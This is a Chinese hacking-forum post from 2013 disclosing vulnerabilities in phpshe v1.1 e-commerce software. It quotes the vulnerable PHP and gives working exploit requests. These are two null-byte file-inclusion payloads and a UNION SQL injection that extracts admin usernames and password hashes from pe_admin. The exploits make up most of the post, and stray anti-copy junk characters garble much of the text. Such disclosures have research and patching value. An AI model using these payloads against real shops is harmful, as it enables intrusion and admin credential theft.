找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1963|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
, E- [# Q1 l0 ^  G& d2 e/* Phpshe v1.1 Vulnerability2 l0 ^1 {6 G* M, ~, k
/* ========================
/ r$ r7 f7 M) N$ ], G7 ]: N- f& p/* By: : Kn1f3
  X( b5 ^- g7 A/* E-Mail : 681796@qq.com$ `: T! ?$ B" p' c' X8 C% \
/*******************************************************/9 W. U0 F' X2 r0 j' y
0×00 整体大概参数传输% m1 d" k( y' ?* D( S
2 U6 T3 [6 \" a' _# O% J0 w

; j: W9 }* R5 \

" ]+ o. G8 f3 U. v9 J$ Y/ l# ]//common.php. a' l# R, p- R- u( s7 D2 h
if (get_magic_quotes_gpc()) {+ D$ [  j. `% v! L
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');% z) V1 B  D1 J( n# I0 p; f$ ]9 x- S
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');( u& H" n* x) F. q" x
}7 |7 j/ t/ D$ I; b$ H! O% ^
else {
4 P- }; d- E8 n4 L1 L!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
5 a# i4 c, @7 L!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
9 p0 H  b" H) G- V- @}
- I5 ]0 {, _- R( X. |! `5 Nsession_start();3 c  o& ]# ^( Y& o
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
, [' e; t* J3 ~1 N& a!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');& G2 _8 v  v9 t) t% w) U

; c9 U& M, @" l$ B0×01 包含漏洞
4 p2 N/ W# z2 T' Y' N! z ( a& I7 U" r6 l6 R. c
/ n3 Q* y+ \  D; r
//首页文件
4 X0 B& [! \# h4 H8 g<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
) Y4 F5 g1 o6 Dinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞8 R3 O. v# r( E# d6 W" _( L; J, \
pe_result();
: h$ ?5 ]* F5 z0 t?>
1 O; ~+ X* S- z//common 文件 第15行开始2 ^. T# ~) j% A* e
url路由配置4 A# ^8 p- `* T
$module = $mod = $act = 'index';# U5 s! B# c, E8 }. i1 Q
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);4 m/ ?- c- t# N$ S) c
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);- _. e' z0 \  N# m
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
* \# Y/ M' h' [; p1 {, h: x* E//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
6 u; y! a+ `7 O8 q9 A# Z

7 d" g* F/ h5 |0 w+ Q; G" N2 s
. V; Z# }; s& L+ H- J/ Y' a
0×02 搜索注入
7 W2 R4 w. s/ ]' i- |% x# I) ~ $ A) T4 `1 G" a  ]  J
<code id="code2">

//product.php文件
* V* i2 h; J2 |& {case 'list':
& l* n# j( `) o5 w2 V$category_id = intval($id);* i! [8 P' m/ x- Y* }3 ?$ [
$info = $db->pe_select('category', array('category_id'=>$category_id));3 c8 P: c' u8 C& B
//搜索: w  w; k# f$ g# a
$sqlwhere = " and `product_state` = 1";
4 p/ Z1 `2 a! k; ]. Ipe_lead('hook/category.hook.php');$ Q2 o+ x$ E- r7 w
if ($category_id) {/ E5 L# w5 Q* y. }
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";- W1 N5 n% E. Q7 n. Y
}, E' i$ K4 y) G  I- N
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
3 T0 {$ V9 W) o7 j" i4 |& zif ($_g_orderby) {4 @; K# S  ]1 K. e. O/ k/ h5 n
$orderby = explode('_', $_g_orderby);
5 j, M& ?! e4 c9 Q6 E6 F$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";7 F6 J3 \2 t; k  m2 u! P' E
}
$ f* m; G" ^9 i& X' |7 celse {% M% ?% w: ?6 H0 Z3 Z
$sqlwhere .= " order by `product_id` desc";
7 q' ?$ [% ]7 D6 b) y}9 V9 U( W# q  R- F3 T
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));* G4 Y4 e. {( {3 H; G8 S
//热卖排行6 M1 K( L) D- p& w" t
$product_hotlist = product_hotlist();8 X; i4 Z- h: s
//当前路径$ S- V+ O: q0 U8 D
$nowpath = category_path($category_id);
4 d) `1 i4 w2 O  ~& H- }6 h5 P$seo = pe_seo($info['category_name']);
9 n9 |: O& Y, c6 Hinclude(pe_tpl('product_list.html'));
* X0 T& e+ _# N/ q# }//跟进selectall函数库+ }  X; R- O6 O5 d2 s6 I  D# D
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
7 q* \: s: ~- {( x{8 h( W; S3 {) X& d0 p! v! Q
//处理条件语句& v$ A0 ~" ?/ @
$sqlwhere = $this->_dowhere($where);8 o6 G" U# u5 P: L" @% F
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);, r- u+ x" c* G% V3 j5 X2 J
}
3 F/ }- J" G9 [//exp
$ U' F4 E+ L# j3 S! uproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
: S* P3 R8 }* z% z6 L. u! ^. n

</code>
0 o; |; q/ j6 E3 L. s- g , C2 P4 f' t; I3 N
0×03 包含漏洞2. Y* P3 j  z6 U1 l' V' V
  X( v. k8 h. C" ?/ B
<code id="code3">

//order.php

case 'pay':

: H8 {6 }  U  w$ G! J1 w1 w0 E
$order_id = pe_dbhold($_g_id);

" r; |- l5 A+ s! V! v. D5 p
$cache_payway = cache::get('payway');


5 p% U* s' k  h; Oforeach($cache_payway as $k => $v) {


; Y+ t) n) K7 R& N: e$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


3 y) O2 i& q( n* ]if ($k == 'bank') {

  V, j8 a: K6 ?3 k: W7 \# T5 U' r
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

* y& N9 m, [3 o
}

4 x  p, X" G( @/ `5 j- g: S
}

6 n4 G: ?7 p! M
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


& ~4 T0 n; L6 w+ u: V, p& n' P!$order['order_id'] && pe_error('订单号错误...');


4 q# V$ O, W) [7 t, {. ?if (isset($_p_pesubmit)) {

; k  Y8 ~4 U4 V7 G" ^2 U; R& |
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


6 g# G, x& T1 U- ~, F1 ~' L$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

0 J! a: x+ g9 ?8 z
foreach ($info_list as $v) {


' q. v1 T& s8 T& f% [' A/ O$order['order_name'] .= "{$v['product_name']};";1 f1 E! G4 `3 O( i, |( A; i


  U3 S# Q1 ~4 A2 z}


/ N6 k4 ]& s3 q7 l9 R8 Iecho '正在为您连接支付网站,请稍后...';

- Q$ v3 `) ^6 s- K& D' p: e' V
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

+ t/ F$ A8 T1 l. B* f
}//当一切准备好的时候就可以进行"鸡肋包含了"


  ~* ~& v, i6 m5 @else {

7 c% l( o; {. Q6 J
pe_error('支付错误...');


. i/ l# `  g! Z9 N/ E" n# ~4 R}

; p8 E. u1 F- ~" w# b
}

" h% Y5 m4 r8 W+ n* t
$seo = pe_seo('选择支付方式');


4 \9 V; @4 z( @) sinclude(pe_tpl('order_pay.html'));

& G( J' G) C5 M' T1 U, s
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>: G- a, t. A! g2 Y& }' ^
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表